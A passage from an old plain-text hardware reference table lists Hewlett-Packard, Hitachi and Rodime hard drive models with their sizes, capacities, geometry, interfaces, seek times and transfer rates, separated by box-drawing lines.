ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HEWLETT-PKD. HP-97548E 5.25 FULL 795.0MB 680.0MB 56 8 16 VC ESDI RLL(2,7) Y 17mS 20.0Mb 150K 33.0W 4002RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HEWLETT-PKD. HP-97548S/D 5.25 FULL 795.0MB 663.0MB 8 16 VC SCSI RLL(2,7) Y 17mS 20.0Mb 150K 4002RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HEWLETT-PKD. HP-97548T/P 5.25 FULL 795.0MB 663.0MB 8 16 VC SCSI-2 RLL(2,7) Y 17mS 20.OMb 150K 4002RPM,R/S ECC + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HEWLETT-PKD. HP-97549T/P 5.25 FULL 1180.0MB 1000.0MB 8 16 VC SCSI-2 RLL(2,7) Y 18mS 22.8Mb 150K 4002RPM,R/S ECC + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HEWLETT-PKD. HP-97556E 5.25 FULL 793.0MB 681.0MB 6 11 VC ESDI RLL(2,7) Y 14mS 23.0Mb 150K 20.0W 4002RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HEWLETT-PKD. HP-97556T/P 5.25 FULL 793.0MB 677.0MB 6 11 VC SCSI-2 RLL(2,7) Y 14mS 23.0Mb 150K 4002RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HEWLETT-PKD. HP-97558E 5.25 FULL 1260.0MB 1084.0MB 8 15 VC ESDI RLL(2,7) Y 14mS 23.0Mb 150K 28.0W 4002RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HEWLETT-PKD. HP-97558T/P 5.25 FULL 1260.0MB 1070.0MB 8 15 VC SCSI-2 RLL(2,7) Y 14mS 23.0Mb 150K 4002RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HEWLETT-PKD. HP-97560E 5.25 FULL 1600.0MB 1374.0MB 10 19 VC ESDI RLL(2,7) Y 14mS 23.0Mb 150K 31.0W 4002RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HEWLETT-PKD. HP-97560T/P 5.25 FULL 1600.0MB 1360.0MB 10 19 VC SCSI-2 RLL(2,7) Y 14mS 23.0Mb 150K 4002RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HEWLETT-PKD. HP-D1660A 5.25 FULL 333.0MB 1457 57 8 VC ESDI RLL(2,7) Y 16mS 20.0Mb 150K 21.0W 64KB CACHE + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HEWLETT-PKD. HP-D1661A 5.25 FULL 667.0MB 1457 57 16 VC ESDI RLL(2,7) Y 16mS 20.0Mb 150K 21.0W 64KB CACHE + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HITACHI DK301-1 3.50 HALF 10.0MB 306 128 17 2 4 ST412 MFM 85mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HITACHI DK301-2 3.50 HALF 15.0MB 306 128 17 3 6 ST412 MFM 85mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HITACHI DK312C-20 3.50 HALF 209.0MB 10 VC SCSI RLL(2,7) Y 16mS 32.0Mb 150K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HITACHI DK312C-25 3.50 HALF 251.0MB 12 VC SCSI RLL(2,7) Y 16mS 32.0Mb 150K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HITACHI DK314C-41 3.50 HALF 419.0MB 14 VC SCSI RLL(2,7) Y 17mS 32.0Mb 150K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HITACHI DK511-3 5.25 FULL 28.0MB 699 256 17 3 5 ST412 MFM 30mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HITACHI DK511-5 5.25 FULL 41.0MB 699 256 17 4 7 ST412 MFM 30mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HITACHI DK511-8 5.25 FULL 67.0MB 823 17 5 10 ST412 MFM 23mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HITACHI DK512-12 5.25 FULL 94.0MB 823 4 7 ESDI RLL(2,7) 23mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HITACHI DK512-17 5.25 FULL 134.0MB 823 5 10 ESDI RLL(2,7) 28mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HITACHI DK512-8 5.25 FULL 67.0MB 823 3 5 ESDI RLL(2,7) 23mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HITACHI DK512C-12 5.25 FULL 94.0MB 823 4 7 SCSI RLL(2,7) 23mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HITACHI DK512C-17 5.25 FULL 134.0MB 819 5 10 SCSI RLL(2,7) 23mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + + þ + + + + + + + + + PAGE 14 + --SIZE-- -----CAPACITY---- PRE- S/ # RW HD INTER- RECORD TKS AVE XFER POWER + MANUFACTURER MODEL NUMBER WTH. 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ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME RO-3088A 3.50 HALF 88.0MB 75.6MB 868 3 5 VC IDE(AT) RLL(2,7) Y 18mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME RO-3088T 3.50 HALF 88.0MB 75.6MB 868 3 5 VC SCSI RLL(2,7) Y 18mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + + þ + + + + + + + + + PAGE 34 + --SIZE-- -----CAPACITY---- PRE- S/ # RW HD INTER- RECORD TKS AVE XFER POWER + MANUFACTURER MODEL NUMBER WTH. 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ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME RO-3128T 3.50 HALF 105.8MB 868 4 7 VC SCSI RLL(2,7) Y 18mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME RO-3129A 3.50 HALF 129.0MB 105.8MB 1091 3 5 VC IDE(AT) RLL(2,7) Y 18mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME RO-3129T 3.50 HALF 105.8MB 1091 3 5 VC SCSI RLL(2,7) Y 18mS 12.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME RO-3135A 3.50 HALF 135.0MB 112.5MB 923 4 7 VC IDE(AT) RLL(2,7) Y 19mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME RO-3139A 3.50 HALF 139.0MB 112.5MB 1168 3 5 VC IDE(AT) RLL(2,7) Y 18mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME RO-3151A 3.50 HALF 122.0MB 2 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME RO-3259A 3.50 HALF 259.0MB 210.0MB VC IDE(AT) RLL(2,7) Y 18mS + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME RO-3259T 3.50 HALF 259.0MB 210.0MB VC SCSI(S) RLL(2,7) Y 18mS 32.0Mb 32K CACHE + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME RO-351 3.50 HALF 5.0MB 306 128 17 1 2 ST412 MFM 85mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME RO-352 3.50 HALF 11.0MB 306 128 17 2 4 ST412 MFM 85mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME RO-365 3.50 HALF 21.0MB 612 17 2 4 ST412 MFM 5.0Mb + 